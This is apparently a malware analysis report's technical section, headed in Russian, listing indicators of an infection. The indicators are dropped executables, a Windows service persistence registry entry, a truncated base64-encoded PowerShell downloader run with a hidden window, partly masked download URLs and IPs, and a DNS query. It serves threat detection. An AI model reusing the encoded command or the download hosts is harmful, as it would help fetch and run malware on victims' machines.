Техническая информация
- %HOMEPATH%\rbd3ol9\k141au6\pajtny_.exe
- [<HKLM>\System\CurrentControlSet\Services\pdhui] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\pdhui] 'ImagePath' = '"<SYSTEM32>\taskschd\pdhui.exe"'
- 'pdhui' "<SYSTEM32>\taskschd\pdhui.exe"
- 'pdhui' <SYSTEM32>\taskschd\pdhui.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAF8ANAB5AHcAdAB1AD0AKAAnAEUAJwArACcANwA4ACcAKwAoACcAbAAnACsAJwA1AG8AZgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdQBzAGUAUgBQAHIAbwBGAEkATABFAFwAcgBiAE...
- %HOMEPATH%\rbd3ol9\k141au6\pajtny_.exe
- <SYSTEM32>\taskschd\pdhui.exe
- '50.##1.220.50':80
- http://ed####edoors.com/wp-includes/nN/
- http://50.##1.220.50/3DvH/uRdGpZR5ZTamSvfLTl/KFgnmQra/JQF6vII1pyS2rxhEbB/ELq6e/
- DNS ASK ed####edoors.com
- '%HOMEPATH%\rbd3ol9\k141au6\pajtny_.exe'
- '<SYSTEM32>\taskschd\pdhui.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAF8ANAB5AHcAdAB1AD0AKAAnAEUAJwArACcANwA4ACcAKwAoACcAbAAnACsAJwA1AG8AZgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdQBzAGUAUgBQAHIAbwBGAEkATABFAFwAcgBiAE...' (со скрытым окном)